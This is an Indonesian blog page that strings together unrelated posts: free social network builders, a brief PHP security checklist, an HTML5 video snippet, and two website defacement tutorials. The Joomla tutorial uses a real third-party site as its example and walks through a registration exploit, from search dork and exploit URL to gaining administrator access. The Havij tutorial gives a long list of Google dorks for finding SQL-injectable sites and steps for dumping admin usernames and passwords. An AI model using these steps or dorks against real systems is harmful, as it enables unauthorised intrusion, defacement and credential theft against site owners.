Breaking News
Loading...

Recent Post

Jumat, 12 Juli 2013
Cara Membuat Social Network Sendiri Tanpa Bayar

Cara Membuat Social Network Sendiri Tanpa Bayar

Saya mau share bagaimana sih cara gratis membuat Social Network alias Situs Jejaring Sosial layaknya Facebook ataupun Friendster tapi kita membuatnya dengan modal Rp.0 alias Gratis tis tis. Bahkan tanpa perlu menguasai bahasa pemrograman Web sekalipun. Terus tidak usah membeli domain ataupun menyewa hosting.
Berikut ini adalah situs-situs yang menyediakan Layanan Pembuatan Social Network secara Gratis :

1. Ning
Situs Social Network Creator yang ini pasti sudah banyak yang tahu, karena situs yang ini sudah lumayan terkenal. Selain itu Proses yang cepat juga menjadi kelebihan Social Network Creator ini. Bahkan hanya dalam waktu 1 menit agan-agan udah bisa ngebuat Situs Jejaring Social yang mirip bentuknya kayak Facebook. Fitur-fitur nya pun menyerupai facebook. Bahkan lebih dari itu situs ini juga menyediakan layanan Blog. Wah wah mangstab deh pokoknya. Kalau mau buat langsung aja ke tkp www.ning.com
Sayangnya situs yang satu ini belum menyediakan layanan berbahasa Indonesia. Namun bisa membantu untuk mentranslate kan ke Bahasa Indonesia, kayak Facebook gitu.

2. Elgg
Kalau yang ini ciri khasnya adalah tampilannya yang elegan. Cukup bagus dan menarik. Namun sayangnya kita harus menyewa hosting dulu untuk menempatkan file php dari elgg nya. Tapi kalau pake Web Hosting Gratisan juga bisa kok. Udah gitu harus Download dulu File PHP'a.
ya kayak semacam CMS gitu. Tapi Elgg ini adalah OpenSource Social Networking lho. Sama kayak Joomla gitu. Tertarik?? Langsung aja gan ke TKP www.elgg.org
Atau yang males ke TKP bisa Langsung Download File PHPnya.

3. SocialGo
Kalau yang ini saya belum begitu tahu banyak. Karena Social Network Creator ini hampir sama seperti Ning.com cuma kelebihannya yang ini Temlate nya bisa diutak-atik. Yah daripada ane ngejelasain tapi salah-salah mending langsung aja agan ke tkp dan coba sendiri www.socialgo.com

4. Wackwall
Ada satu lagi nih Social Network Cretator gratis tis tis, namanya Wackwall.
Bentuknya mirip sama Ning.com tetapi membuat Social Network di Wackwall lebih gampang lagi. Selain itu di Wackwall agan bisa memakai domain agan sendiri. Tapi ane belum begitu tahu gimana settingan nya. Namun sayangnya tampilannya standar dan biasa saja.
Teknik Security Pada PHP

Teknik Security Pada PHP

TEKNIK SECURITY PADA PHP :
=========================

1. Mengganti Password Default Admin

2. Memberikan Enkripsi Password

3. Mendisable Edit Username

4. Menghalau Spam dengan Captcha

5. Melumpuhkan XSS Attack
XSS (Cross Side Scripting) adalah suatu cara memasukkan tag/skrip HTML (injeksi) ke dalam website dengan tujuan untuk mengacaukan website. Sehingga apabila website dibuka akan langsung diarahkan ke URL/web sesuai dg script yg dituju. Script yg digunakan dapat berupa HTML, Javascript, VBscript, Action Script, active x, dsb. Cara menginjeksinya adalah dengan memasukkan script melalui form, misal : komentar, contact, dsb.
Cara menanggulanginya adalah dengan memfungsikan :
a. Fungsi : striptslashes
b. Fungsi : stript_tags
c. Fungsi : htmlspecialchars
d. Fungsi : ENT_QUOTES

6. Menangkal SQL Injection
SQL Injection adalah teknik memanipulasi perintah SQL untuk dijalankan tanpa sepengetahuan anda. Sehingga memungkinkan orang lain dapat masuk (login) ke dalam kosong tanpa harus memasukkan username & password.

7. Menjinakkan Blind SQL Injection

8. Validasi data menggunakan javascript

9. Mencegah browsing folder secara langsung

10. Mengatasi input data tanpa spasi

11. Menutup celah downloads

12. Membuat coding tuk mencegah editing password admin oleh user biasa

13. Memberikan nama unik untuk folder admin

Terimakasih sudah membaca Teknik keamanan pada website yang menggunakan PHP. semoga bermanfaat :)
Cara Mudah Membuat Video Streaming Menggunakan HTML 5

Cara Mudah Membuat Video Streaming Menggunakan HTML 5

Bagi agan-agan yang mau bikin streaming video seperti di Youtube, scriptnya sangat simple tinggal dikembangin lagi, gak perlu Flash Player..


<!DOCTYPE html>
<html>
<body>
<div style="text-align:center">
<video id="video" width="420" controls="controls">
<source src="
video.mp4" type="video/mp4" />
Your browser does not support HTML5 video.
</video>
</div>
</body>
</html>

Terimakasih sudah membaca Cara mudah membuat video streaming seperti di Youtube menggunakan HTML 5. Semoga bermanfaat :)
Tutorial Deface Website dengan Exploit Joomla

Tutorial Deface Website dengan Exploit Joomla

Silahkan tutorial ini di baca dulu baik-baik, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch.

"Talk Less Do More!"
oke dah simak nih! sebelumnya download dulu bahan

Download : Exploit Joomla.html

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Kembangin Sendiri :p

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration
3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration



















5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboardCTRL+U.
kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:


















6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !






7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!






8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!



9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!






10. Lalu masuk kehalaman admin login nya! http://mobile.resto-lincontournable.com/administrator






11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username : Elu
Password : Maho

Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p



Goodluck!!! :p
Cara Deface Website Menggunakan Havij

Cara Deface Website Menggunakan Havij

1. Silahkan buka tools Havij anda, jika belum punya bisa di download Havij versi 1.15 Pro.
DOWNLOAD DISINI
Untuk mencari target gunakan Tool XCodeXploitScanner dan Dork dibawah ini.

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=

intext:"error in your SQL syntax" +site:mm
intext:"mysql_num_rows()" +site:mm
intext:"mysql_fetch_array()" +site:mm
intext:"Error Occurred While Processing Request" +site:mm
intext:"Server Error in '/' Application" +site:mm
intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:mm
intext:"Invalid Querystring" +site:mm
intext:"OLE DB Provider for ODBC" +site:mm
intext:"VBScript Runtime" +site:mm
intext:"ADODB.Field" +site:mm
intext:"BOF or EOF" +site:mm
intext:"ADODB.Command" +site:mm
intext:"JET Database" +site:mm
intext:"mysql_fetch_row()" +site:mm
intext:"Syntax error" +site:mm
intext:"include()" +site:mm
intext:"mysql_fetch_assoc()" +site:mm
intext:"mysql_fetch_object()" +site:mm
intext:"mysql_numrows()" +site:mm
intext:"GetArray()" +site:mm
intext:"FetchRow()" +site:mm
intext:"Input string was not in a correct format" +site:mm

Silahkan di edit lagi dorknya biar lebih ampuh..


2. setelah ketemu, masukkan link target ke kolom target lalu klik "Analyze"
NB : Masukkan bagian url yang berakhiran id=angka untuk di inject, bukan indexnya..
Contoh : www.site.com/index.asp?id=123 seperti contoh yang ada di havijnya..





3. Selanjutnya setelah ketemu databasenya centang seperti di gambar dan Klik iconTables, tampilannya seperti ini :



4. Lanjutkan dengan mengKlik Get DBs Screenshoot seperti di bawah ini :




5. Nah loh sudah keliatan databasenya..kita oprek tabel admin atau administrator saja untuk cari user sama passwordnya..Klik DB Administrator lalu klik Get Tables, nanti akan keluar table..




6. Nah keluar tabel admin kemudian centang tabel admin dan Get Data..








7. Itu nongol username sama passwordnya..sekarang tinggal cari halaman admin loginnya,di Havij sudah disediakan untuk mencari halaman admin login dan Hash password jika nanti nemu password MD5..





Udah gitu ja sekian terima kasih.. :D
Copyright © 2013 Wnorcx All Right Reserved